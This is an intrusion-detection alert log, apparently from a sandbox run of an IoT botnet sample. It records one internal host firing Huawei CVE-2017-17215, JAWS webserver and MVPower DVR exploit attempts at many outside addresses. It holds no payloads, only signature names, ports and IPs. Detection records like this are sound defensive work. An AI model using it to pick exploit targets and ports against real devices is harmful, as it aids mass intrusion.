                            06/10/24-15:38:00.247270TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5975237215192.168.2.1341.215.9.130
                            06/10/24-15:37:59.969655TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4903437215192.168.2.13197.216.238.129
                            06/10/24-15:37:59.981701TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4112037215192.168.2.1341.186.239.153
                            06/10/24-15:38:02.226488TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5462680192.168.2.13134.253.9.177
                            06/10/24-15:38:02.703161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4552637215192.168.2.13156.79.220.96
                            06/10/24-15:37:59.950533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3896037215192.168.2.1341.86.126.31
                            06/10/24-15:37:59.977354TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6087837215192.168.2.1341.140.184.247
                            06/10/24-15:38:02.816370TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5633037215192.168.2.1341.242.68.175
                            06/10/24-15:38:00.213146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4487437215192.168.2.13197.126.47.34
                            06/10/24-15:38:02.165236TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5394280192.168.2.13172.189.3.93
                            06/10/24-15:38:00.000374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4252037215192.168.2.13156.225.196.18
                            06/10/24-15:38:02.186210TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5293480192.168.2.13189.184.117.112
                            06/10/24-15:38:00.205114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4311637215192.168.2.1341.237.191.106
                            06/10/24-15:38:00.008957TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3660837215192.168.2.1341.223.243.35
                            06/10/24-15:38:02.640548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5217237215192.168.2.13197.78.160.7
                            06/10/24-15:37:59.930930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3283437215192.168.2.13156.249.70.243
                            06/10/24-15:38:00.168829TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6010237215192.168.2.13197.140.21.238
                            06/10/24-15:38:02.831855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4901437215192.168.2.1341.139.202.223
                            06/10/24-15:38:02.196419TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5808880192.168.2.1360.159.195.222
                            06/10/24-15:38:02.819947TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4609037215192.168.2.13156.21.102.72
                            06/10/24-15:38:02.490299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5464837215192.168.2.13156.113.194.151
                            06/10/24-15:38:00.172951TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5767837215192.168.2.1341.13.119.15
                            06/10/24-15:38:02.197003TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5522880192.168.2.1376.250.8.228
                            06/10/24-15:38:02.650127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3686637215192.168.2.13197.35.156.28
                            06/10/24-15:38:02.698008TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4258637215192.168.2.1341.64.38.156
                            06/10/24-15:38:02.839299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5741237215192.168.2.13197.106.115.54
                            06/10/24-15:38:02.091217TCP2025883ET EXPLOIT MVPower DVR Shell UCE5517880192.168.2.1375.148.35.4
                            06/10/24-15:38:00.219730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4659437215192.168.2.1341.228.140.97
                            06/10/24-15:38:02.725896TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5001237215192.168.2.13197.50.7.2
                            06/10/24-15:38:02.730340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3400837215192.168.2.13156.36.1.67
                            06/10/24-15:38:02.930759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3376837215192.168.2.13156.147.57.40
                            06/10/24-15:38:02.170154TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5318280192.168.2.13175.46.116.191
                            06/10/24-15:38:02.221501TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5020080192.168.2.13176.61.110.28
                            06/10/24-15:38:02.639864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5121437215192.168.2.1341.253.166.204
                            06/10/24-15:38:02.136395TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3672880192.168.2.13162.38.247.40
                            06/10/24-15:38:00.205893TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3661037215192.168.2.13197.128.46.215
                            06/10/24-15:38:02.192228TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6007480192.168.2.1364.49.25.82
                            06/10/24-15:38:02.494522TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3921237215192.168.2.1341.246.40.161
                            06/10/24-15:38:02.704450TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4085637215192.168.2.1341.213.236.151
                            06/10/24-15:38:02.866110TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5450237215192.168.2.13156.239.132.115
                            06/10/24-15:37:59.831568TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5346280192.168.2.13220.219.206.99
                            06/10/24-15:38:02.726932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3446837215192.168.2.13156.185.253.184
                            06/10/24-15:38:00.226767TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3388837215192.168.2.13197.22.241.36
                            06/10/24-15:37:59.957760TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5105037215192.168.2.1341.41.95.201
                            06/10/24-15:38:02.084991TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5891280192.168.2.1367.115.43.219
                            06/10/24-15:38:02.643438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5425237215192.168.2.13156.20.242.161
                            06/10/24-15:38:02.087778TCP2025883ET EXPLOIT MVPower DVR Shell UCE4668480192.168.2.1362.168.165.136
                            06/10/24-15:38:00.214768TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5092637215192.168.2.13197.29.244.234
                            06/10/24-15:38:02.115391TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5790880192.168.2.13208.224.88.164
                            06/10/24-15:38:02.879110TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5805037215192.168.2.1341.150.80.142
                            06/10/24-15:38:02.647915TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5140437215192.168.2.13197.111.134.175
                            06/10/24-15:38:02.680398TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3990237215192.168.2.1341.164.87.115
                            06/10/24-15:38:00.194715TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3740237215192.168.2.13197.153.65.158
                            06/10/24-15:38:02.642678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4188837215192.168.2.13156.17.79.89
                            06/10/24-15:38:02.801648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4244037215192.168.2.13156.201.150.156
                            06/10/24-15:38:00.203547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4567837215192.168.2.13197.246.123.244
                            06/10/24-15:37:59.873252TCP2025883ET EXPLOIT MVPower DVR Shell UCE5273680192.168.2.1396.171.224.255
                            06/10/24-15:38:02.759599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4396237215192.168.2.1341.212.41.218
                            06/10/24-15:38:00.182265TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3483037215192.168.2.13197.26.246.153
                            06/10/24-15:37:59.995486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5856437215192.168.2.13156.245.2.205
                            06/10/24-15:38:00.202797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4911437215192.168.2.1341.206.110.186
                            06/10/24-15:37:59.943220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3409237215192.168.2.1341.30.124.178
                            06/10/24-15:38:00.200487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3899037215192.168.2.13197.73.57.101
                            06/10/24-15:38:00.188379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4457637215192.168.2.13197.152.159.10
                            06/10/24-15:38:02.328277TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3456280192.168.2.1336.200.197.84
                            06/10/24-15:38:00.014210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5636037215192.168.2.1341.241.121.248
                            06/10/24-15:38:02.126715TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4307280192.168.2.13148.32.33.91
                            06/10/24-15:38:02.217347TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3655080192.168.2.13124.237.240.235
                            06/10/24-15:37:59.822693TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3432680192.168.2.13161.147.107.200
                            06/10/24-15:37:59.802263TCP2025883ET EXPLOIT MVPower DVR Shell UCE4784080192.168.2.1399.27.23.33
                            06/10/24-15:37:59.996932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3853837215192.168.2.1341.179.145.152
                            06/10/24-15:38:02.145724TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3399480192.168.2.1399.191.18.126
                            06/10/24-15:37:59.948996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4210837215192.168.2.13197.215.149.213
                            06/10/24-15:38:00.013509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5297637215192.168.2.13197.57.169.86
                            06/10/24-15:38:02.699989TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5693237215192.168.2.1341.161.75.219
                            06/10/24-15:38:02.502251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5169437215192.168.2.13197.235.58.223
                            06/10/24-15:38:02.134607TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3961880192.168.2.13179.209.203.124
                            06/10/24-15:37:59.943966TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6061437215192.168.2.13156.10.20.117
                            06/10/24-15:37:59.956134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3841437215192.168.2.13156.167.122.41
                            06/10/24-15:38:02.639134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3793237215192.168.2.13156.242.158.116
                            06/10/24-15:38:00.227634TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5684637215192.168.2.1341.31.222.74
                            06/10/24-15:38:00.012794TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4915637215192.168.2.13156.245.237.250
                            06/10/24-15:38:02.673517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3819637215192.168.2.13197.217.153.165
                            06/10/24-15:38:02.663241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5425437215192.168.2.13156.225.226.13
                            06/10/24-15:38:02.509056TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4322437215192.168.2.13156.103.216.158
                            06/10/24-15:37:59.952964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5650837215192.168.2.13197.35.253.5
                            06/10/24-15:37:59.965473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4832837215192.168.2.1341.15.193.245
                            06/10/24-15:38:02.227237TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4560480192.168.2.1382.198.125.207
                            06/10/24-15:38:02.139988TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5155680192.168.2.13130.57.240.142
                            06/10/24-15:38:02.180176TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3603480192.168.2.1362.202.106.198
                            06/10/24-15:38:02.711502TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5687037215192.168.2.1341.91.70.189
                            06/10/24-15:38:02.506945TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3886037215192.168.2.1341.53.52.238
                            06/10/24-15:38:00.037730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5009637215192.168.2.13156.175.16.45
                            06/10/24-15:38:02.761061TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3623037215192.168.2.13197.0.213.101
                            06/10/24-15:38:00.263818TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4573637215192.168.2.1341.207.144.176
                            06/10/24-15:38:02.867036TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5267837215192.168.2.13197.121.202.25
                            06/10/24-15:38:02.257662TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5136280192.168.2.13139.221.66.14
                            06/10/24-15:38:02.796621TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5159037215192.168.2.13197.197.52.159
                            06/10/24-15:38:00.173963TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3304037215192.168.2.13156.217.108.5
                            06/10/24-15:38:02.222619TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5540280192.168.2.1388.20.26.107
                            06/10/24-15:38:00.244658TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4754037215192.168.2.1341.182.154.164
                            06/10/24-15:37:59.811339TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5438080192.168.2.13167.251.162.140
                            06/10/24-15:38:00.032058TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5181437215192.168.2.13197.105.195.56
                            06/10/24-15:38:02.828946TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5533837215192.168.2.13197.51.133.84
                            06/10/24-15:38:02.712763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5698037215192.168.2.13156.212.245.105
                            06/10/24-15:38:00.207478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5920237215192.168.2.13156.200.117.215
                            06/10/24-15:38:00.264605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4861037215192.168.2.13156.7.198.77
                            06/10/24-15:38:00.170870TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5746437215192.168.2.1341.65.114.229
                            06/10/24-15:38:02.138190TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3947280192.168.2.13180.138.26.228
                            06/10/24-15:37:59.847523TCP2025883ET EXPLOIT MVPower DVR Shell UCE5852280192.168.2.1392.126.239.180
                            06/10/24-15:37:59.961213TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4256437215192.168.2.13197.27.200.127
                            06/10/24-15:37:59.937775TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5108837215192.168.2.13156.185.143.113
                            06/10/24-15:38:00.225874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6048637215192.168.2.13197.25.198.155
                            06/10/24-15:38:02.871465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3846637215192.168.2.13197.29.159.134
                            06/10/24-15:38:02.740863TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5923037215192.168.2.1341.111.68.220
                            06/10/24-15:37:59.924273TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5532237215192.168.2.1341.112.237.34
                            06/10/24-15:38:02.701067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3546837215192.168.2.1341.229.41.14
                            06/10/24-15:38:02.920636TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5788637215192.168.2.13197.184.200.60
                            06/10/24-15:38:00.012098TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5026837215192.168.2.13197.128.25.119
                            06/10/24-15:38:02.567099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4543837215192.168.2.13156.99.186.57
                            06/10/24-15:38:02.798921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5894037215192.168.2.13156.145.128.99
                            06/10/24-15:37:59.970506TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6004637215192.168.2.1341.174.115.39
                            06/10/24-15:38:02.696885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5635637215192.168.2.13197.110.23.1
                            06/10/24-15:38:02.859446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5573437215192.168.2.1341.119.169.82
                            06/10/24-15:38:02.489622TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3609037215192.168.2.1341.43.184.117
                            06/10/24-15:38:02.265344TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5704680192.168.2.1376.19.240.75
                            06/10/24-15:38:02.756024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3735837215192.168.2.13156.165.101.234
                            06/10/24-15:38:02.863237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3764237215192.168.2.1341.14.234.212
                            06/10/24-15:38:02.146535TCP2025883ET EXPLOIT MVPower DVR Shell UCE3640080192.168.2.1372.99.239.26
                            06/10/24-15:38:00.252450TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3723437215192.168.2.13197.176.22.163
                            06/10/24-15:38:02.658653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5834637215192.168.2.13156.2.142.241
                            06/10/24-15:38:02.496645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4458237215192.168.2.13197.62.0.215
                            06/10/24-15:37:59.972189TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4154837215192.168.2.13197.33.14.33
                            06/10/24-15:38:02.164056TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5006680192.168.2.13113.161.7.171
                            06/10/24-15:38:02.209869TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4061480192.168.2.1382.111.112.237
                            06/10/24-15:38:02.253866TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5653680192.168.2.1324.116.173.33
                            06/10/24-15:38:02.093026TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4766680192.168.2.13132.254.47.159
                            06/10/24-15:38:02.112260TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6074080192.168.2.13175.194.108.221
                            06/10/24-15:38:02.491767TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5928837215192.168.2.1341.172.90.182
                            06/10/24-15:38:02.504277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5538837215192.168.2.13197.86.241.113
                            06/10/24-15:37:59.842965TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4927680192.168.2.13219.24.143.221
                            06/10/24-15:38:02.837956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5148237215192.168.2.13156.161.132.25
                            06/10/24-15:38:00.132778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4068637215192.168.2.1341.219.156.112
                            06/10/24-15:38:00.265357TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5126837215192.168.2.1341.201.241.195
                            06/10/24-15:38:02.164719TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3574480192.168.2.1399.110.30.54
                            06/10/24-15:38:02.103822TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3872880192.168.2.13223.124.210.132
                            06/10/24-15:38:02.772411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4304837215192.168.2.13156.186.79.156
                            06/10/24-15:38:00.215590TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5753437215192.168.2.13156.166.206.200
                            06/10/24-15:38:02.906256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3383637215192.168.2.1341.161.161.103
                            06/10/24-15:38:02.129599TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3936080192.168.2.13107.49.182.125
                            06/10/24-15:38:00.254476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3605837215192.168.2.1341.214.194.245
                            06/10/24-15:38:02.177224TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4660880192.168.2.13201.247.10.188
                            06/10/24-15:37:59.765229TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4595680192.168.2.1320.2.48.78
                            06/10/24-15:37:59.854316TCP2025883ET EXPLOIT MVPower DVR Shell UCE4902280192.168.2.1380.246.211.214
                            06/10/24-15:38:02.220675TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5786480192.168.2.13110.93.10.149
                            06/10/24-15:38:02.774996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3913837215192.168.2.13156.179.59.101
                            06/10/24-15:38:02.851207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5557237215192.168.2.13197.81.50.55
                            06/10/24-15:38:02.750600TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4821637215192.168.2.1341.96.242.34
                            06/10/24-15:38:00.011379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4389637215192.168.2.1341.186.220.178
                            06/10/24-15:38:02.909928TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5442637215192.168.2.1341.223.106.15
                            06/10/24-15:38:00.271532TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5104837215192.168.2.1341.136.101.104
                            06/10/24-15:37:59.926044TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4443637215192.168.2.13156.190.41.183
                            06/10/24-15:38:02.638444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4063837215192.168.2.1341.46.185.236
                            06/10/24-15:38:02.193979TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4001280192.168.2.1352.106.240.216
                            06/10/24-15:38:02.111021TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4995280192.168.2.1319.78.165.78
                            06/10/24-15:37:59.753726TCP2025883ET EXPLOIT MVPower DVR Shell UCE5864880192.168.2.1350.13.193.163
                            06/10/24-15:38:02.646438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4528037215192.168.2.13197.159.14.165
                            06/10/24-15:38:00.030618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4158437215192.168.2.1341.169.217.182
                            06/10/24-15:38:02.874286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6066637215192.168.2.13197.65.234.66
                            06/10/24-15:38:02.693449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3790837215192.168.2.13197.2.17.159
                            06/10/24-15:37:59.979940TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3536237215192.168.2.1341.117.93.142
                            06/10/24-15:37:59.874568TCP2025883ET EXPLOIT MVPower DVR Shell UCE5782480192.168.2.13135.106.4.49
                            06/10/24-15:38:00.198882TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4070637215192.168.2.1341.229.216.231
                            06/10/24-15:38:00.028419TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4299637215192.168.2.13197.211.105.203
                            06/10/24-15:38:02.111653TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3616080192.168.2.13123.231.38.192
                            06/10/24-15:38:00.240544TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3952637215192.168.2.13156.14.175.34
                            06/10/24-15:38:02.499468TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5164237215192.168.2.1341.186.51.90
                            06/10/24-15:38:02.647206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3907037215192.168.2.13156.230.86.20
                            06/10/24-15:38:02.679364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5530837215192.168.2.1341.184.163.172
                            06/10/24-15:37:59.941715TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4128237215192.168.2.13156.97.36.34
                            06/10/24-15:38:00.022039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4804637215192.168.2.13197.167.77.113
                            06/10/24-15:37:59.956930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3935437215192.168.2.1341.113.11.68
                            06/10/24-15:38:02.190464TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5479680192.168.2.13163.171.166.32
                            06/10/24-15:38:00.033459TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3641437215192.168.2.13156.115.29.3
                            06/10/24-15:37:59.786107TCP2025883ET EXPLOIT MVPower DVR Shell UCE4024680192.168.2.1396.121.230.115
                            06/10/24-15:37:59.927028TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3306437215192.168.2.1341.251.69.196
                            06/10/24-15:38:02.872396TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3320237215192.168.2.13156.136.99.172
                            06/10/24-15:38:02.656592TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3415437215192.168.2.13156.66.27.141
                            06/10/24-15:38:02.856030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4688837215192.168.2.1341.147.198.198
                            06/10/24-15:38:02.656081TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3893037215192.168.2.1341.120.207.139
                            06/10/24-15:38:02.814855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3514037215192.168.2.13197.255.67.237
                            06/10/24-15:37:59.997798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4255637215192.168.2.1341.195.163.183
                            06/10/24-15:38:02.247308TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6039280192.168.2.13140.40.175.146
                            06/10/24-15:38:00.016307TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6050237215192.168.2.13156.176.31.94
                            06/10/24-15:37:59.962047TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5611437215192.168.2.13156.237.170.76
                            06/10/24-15:38:02.731556TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5496037215192.168.2.13156.86.244.31
                            06/10/24-15:38:02.495900TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5456637215192.168.2.13156.84.42.33
